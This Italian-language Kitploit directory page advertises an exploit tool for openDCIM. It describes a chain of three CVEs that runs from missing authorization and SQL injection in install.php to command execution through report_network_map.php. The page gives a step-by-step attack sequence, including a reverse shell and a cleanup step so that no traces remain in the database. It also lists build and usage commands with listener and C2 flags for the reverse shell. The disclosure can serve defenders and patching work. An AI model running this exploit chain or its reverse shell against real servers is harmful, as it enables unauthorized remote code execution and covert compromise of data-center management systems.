Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
opendcim-exploit — openDCIM install.php catena da SQLi a RCE (CWE-862 + CWE-89 + CWE-78) | Kitploit
Strumenti/GitHubGitHub/chocapikk/opendcim-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php catena da SQLi a RCE (CWE-862 + CWE-89 + CWE-78)

Vedi Repository
526 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

openDCIM - SQLi a RCE tramite Config Poisoning

Catena di esecuzione remota di codice che prende di mira il modulo di configurazione LDAP di install.php di openDCIM. Costruita sul framework VulnCheck go-exploit.

Catena di vulnerabilità

#CVECWEDescrizione
1CVE-2026-28515CWE-862install.php non esegue alcun controllo di ruolo prima del modulo di configurazione LDAP - qualsiasi utente può raggiungerlo
2CVE-2026-28516CWE-89Config::UpdateParameter() usa l'interpolazione di stringhe, stacked queries tramite PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php passa il valore di configurazione dot direttamente a exec()

Versioni interessate: tutte le versioni (testato sull'ultimo commit 4467e9c4)

Come funziona

  1. POST a install.php - l'iniezione SQL tramite il modulo LDAP esegue il backup della configurazione e sovrascrive dot con un payload di comando
  2. GET report_network_map.php - attiva exec(), conferma la RCE tramite l'output di id
  3. POST a install.php - sovrascrive dot con un payload di reverse shell
  4. GET report_network_map.php - attiva la reverse shell
  5. POST a install.php - ripristina tutti i valori di configurazione originali dalla tabella di backup

Nessuna traccia lasciata nel database dopo lo sfruttamento.

Compilazione

root@kitploit:~
go build -o opendcim-exploit .

Utilizzo

Deployment Docker (senza autenticazione)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

Deployment htpasswd (qualsiasi utente valido)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Flag

FlagDefaultDescrizione
-rhostHost di destinazione
-rport80Porta di destinazione
-sslfalseUsa HTTPS
-lhostHost del listener (per la reverse shell)
-lportPorta del listener (per la reverse shell)
-c2Tipo di C2: SimpleShellServer o SSLShellServer
-usernameNome utente HTTP Basic Auth (omettere per i deployment SetEnv)
-passwordPassword HTTP Basic Auth (omettere per i deployment SetEnv)
-aRilevamento asset (verifica se il target è sfruttabile)
-eModalità exploit
Scarica lo strumento